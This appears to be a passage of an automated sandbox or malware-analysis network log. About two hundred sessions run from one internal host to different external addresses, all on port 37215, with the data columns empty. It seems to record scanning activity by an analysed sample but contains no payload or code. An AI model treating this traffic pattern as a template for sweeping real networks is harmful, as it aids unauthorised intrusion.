                                                                            17944192.168.2.1533976197.17.221.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17945192.168.2.1552440197.65.118.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17946192.168.2.1544140197.136.115.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17947192.168.2.1557612197.152.117.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17948192.168.2.1559646197.248.26.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17949192.168.2.1560682197.197.148.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17950192.168.2.1550612197.161.64.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17951192.168.2.1542534197.24.97.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17952192.168.2.1541950197.183.194.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17953192.168.2.1535852197.117.95.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17954192.168.2.1539346197.15.229.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17955192.168.2.1542618197.236.0.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17956192.168.2.1552528197.209.195.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17957192.168.2.1554740197.75.196.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17958192.168.2.1559040197.6.209.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17959192.168.2.1534516197.184.233.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17960192.168.2.1541708197.73.225.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17961192.168.2.1541078197.109.205.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17962192.168.2.1552604197.181.3.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17963192.168.2.1557662197.109.174.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17964192.168.2.1536622197.13.226.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17965192.168.2.1537796197.47.66.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17966192.168.2.1555038197.119.61.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17967192.168.2.1559220197.38.169.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17968192.168.2.1558802197.42.54.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17969192.168.2.1552216197.235.219.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17970192.168.2.1551426197.37.227.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17971192.168.2.1550224197.93.253.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17972192.168.2.1543868197.142.82.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17973192.168.2.1556336197.226.180.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17974192.168.2.1547456197.99.131.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17975192.168.2.1537198197.242.236.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17976192.168.2.1535148197.228.24.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17977192.168.2.1550766197.4.89.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17978192.168.2.1548318197.116.228.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17979192.168.2.1535066197.153.25.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17980192.168.2.1555606197.163.79.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17981192.168.2.1546102197.107.193.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17982192.168.2.1538314197.83.185.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17983192.168.2.1549476197.189.93.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17984192.168.2.1555802197.171.181.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17985192.168.2.1536194197.241.253.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17986192.168.2.1546904197.209.244.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17987192.168.2.1559510197.52.227.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17988192.168.2.1543352197.51.114.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17989192.168.2.1538060197.229.85.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17990192.168.2.1546664197.16.39.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17991192.168.2.1542320197.80.228.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17992192.168.2.1549828197.243.99.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17993192.168.2.1556590197.160.169.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17994192.168.2.1548770197.207.5.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17995192.168.2.1544316197.174.175.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17996192.168.2.1544764197.155.210.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17997192.168.2.1555136197.229.75.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17998192.168.2.1555932197.138.153.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17999192.168.2.1555970197.32.124.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18000192.168.2.1557644197.157.227.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18001192.168.2.1535316197.46.28.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18002192.168.2.1545782197.170.195.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18003192.168.2.1554292197.250.145.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18004192.168.2.1536530197.198.208.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18005192.168.2.1554902197.240.140.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18006192.168.2.1550484197.231.53.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18007192.168.2.1559244197.210.61.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18008192.168.2.1547092197.5.15.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18009192.168.2.1541230197.61.95.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18010192.168.2.1551704197.48.174.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18011192.168.2.1551388197.166.54.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18012192.168.2.1556158197.167.28.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18013192.168.2.1559914197.54.171.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18014192.168.2.1548790197.177.129.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18015192.168.2.1549090197.227.188.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18016192.168.2.1537638197.167.148.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18017192.168.2.1555486197.57.53.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18018192.168.2.1546804197.228.98.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18019192.168.2.1551710197.80.39.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18020192.168.2.1535768197.162.107.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18021192.168.2.1555818197.239.226.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18022192.168.2.1549336197.134.19.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18023192.168.2.1532892197.64.117.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18024192.168.2.1559298197.159.224.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18025192.168.2.1548706197.86.142.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18026192.168.2.1538968197.38.24.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18027192.168.2.1545834197.189.219.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18028192.168.2.1544110197.75.86.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18029192.168.2.1554846197.64.75.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18030192.168.2.1547728197.94.59.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18031192.168.2.1557822197.120.91.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18032192.168.2.1536752197.236.140.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18033192.168.2.1535292197.185.235.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18034192.168.2.1537014197.6.208.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18035192.168.2.1547944197.99.214.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18036192.168.2.1546992197.228.131.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18037192.168.2.1548974197.25.237.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18038192.168.2.1534596197.228.127.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18039192.168.2.1559736197.205.145.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18040192.168.2.1542264197.109.230.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18041192.168.2.1535698197.36.198.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18042192.168.2.1547348197.152.148.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18043192.168.2.1560680197.75.177.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18044192.168.2.1536664197.54.108.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18045192.168.2.1556550197.176.27.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18046192.168.2.1544140197.249.144.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18047192.168.2.1534448197.229.115.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18048192.168.2.1555716197.168.246.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18049192.168.2.1539576197.223.108.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18050192.168.2.1537624197.117.78.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18051192.168.2.1540238197.186.151.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18052192.168.2.1541118197.216.36.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18053192.168.2.1555694197.88.131.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18054192.168.2.1536716197.10.30.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18055192.168.2.1560242197.188.222.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18056192.168.2.1547450197.17.240.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18057192.168.2.1546762197.45.165.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18058192.168.2.1533160197.13.77.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18059192.168.2.1558504197.35.175.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18060192.168.2.1553218197.94.45.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18061192.168.2.1541530197.209.24.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18062192.168.2.1540254197.216.102.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18063192.168.2.1559716197.97.156.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18064192.168.2.1542194197.60.212.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18065192.168.2.1546520197.201.53.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18066192.168.2.1545704197.239.150.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18067192.168.2.1550138197.171.237.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18068192.168.2.1553906197.202.181.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18069192.168.2.1532880197.153.48.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18070192.168.2.1532772197.164.180.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18071192.168.2.1536308197.104.172.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18072192.168.2.1553496197.131.189.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18073192.168.2.1554360197.221.178.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18074192.168.2.1549668197.130.122.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18075192.168.2.1549438197.156.126.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18076192.168.2.1557312197.183.66.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18077192.168.2.1540262197.40.21.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18078192.168.2.1536864197.222.75.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18079192.168.2.1534566197.11.173.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18080192.168.2.1546048197.62.167.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18081192.168.2.1555360197.165.32.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18082192.168.2.1533966197.230.176.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18083192.168.2.1538412197.128.209.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18084192.168.2.1532840197.240.169.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18085192.168.2.1559332197.4.33.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18086192.168.2.1550770197.94.205.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18087192.168.2.1560356197.213.68.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18088192.168.2.1559352197.33.44.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18089192.168.2.1550104197.171.145.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18090192.168.2.1554870197.105.150.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18091192.168.2.1560398197.26.208.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18092192.168.2.1550948197.155.178.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18093192.168.2.1550596197.138.120.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18094192.168.2.1534568197.72.167.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18095192.168.2.1550808197.249.37.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18096192.168.2.1538498197.17.23.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18097192.168.2.1558888197.5.122.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18098192.168.2.1533412197.175.44.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18099192.168.2.1559912197.200.191.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18100192.168.2.1534538197.201.154.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18101192.168.2.1551304197.241.14.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18102192.168.2.154981841.240.180.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18103192.168.2.154160041.188.228.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18104192.168.2.154467441.149.26.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18105192.168.2.155013841.242.128.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18106192.168.2.153655041.113.78.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18107192.168.2.154981441.183.5.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18108192.168.2.153698041.122.60.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18109192.168.2.155366241.230.74.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18110192.168.2.155447041.0.48.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18111192.168.2.154234241.121.34.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18112192.168.2.153822841.41.102.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18113192.168.2.155083641.84.70.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18114192.168.2.153840041.125.214.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18115192.168.2.154250641.88.88.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18116192.168.2.155628441.169.5.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18117192.168.2.154695641.172.26.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18118192.168.2.155907241.109.181.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18119192.168.2.153976441.113.194.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18120192.168.2.155674241.22.168.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18121192.168.2.153458841.131.185.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18122192.168.2.154984441.38.247.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18123192.168.2.156086441.98.236.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18124192.168.2.155398841.146.56.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18125192.168.2.153370041.124.227.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18126192.168.2.155010441.191.228.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18127192.168.2.154621241.204.63.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18128192.168.2.155175641.63.52.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18129192.168.2.155032241.149.89.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18130192.168.2.154989241.153.137.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18131192.168.2.155265841.113.237.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18132192.168.2.154193841.170.191.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18133192.168.2.154278041.64.133.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18134192.168.2.155999241.90.210.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18135192.168.2.155491041.114.36.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18136192.168.2.155633041.90.132.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18137192.168.2.155095441.153.29.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18138192.168.2.155762641.129.36.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18139192.168.2.153874441.62.155.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18140192.168.2.154293841.176.179.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18141192.168.2.155013641.221.137.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18142192.168.2.153692441.105.110.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18143192.168.2.155772241.2.163.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18144192.168.2.153759641.29.140.4537215
                                                                            TimestampBytes transferredDirectionData


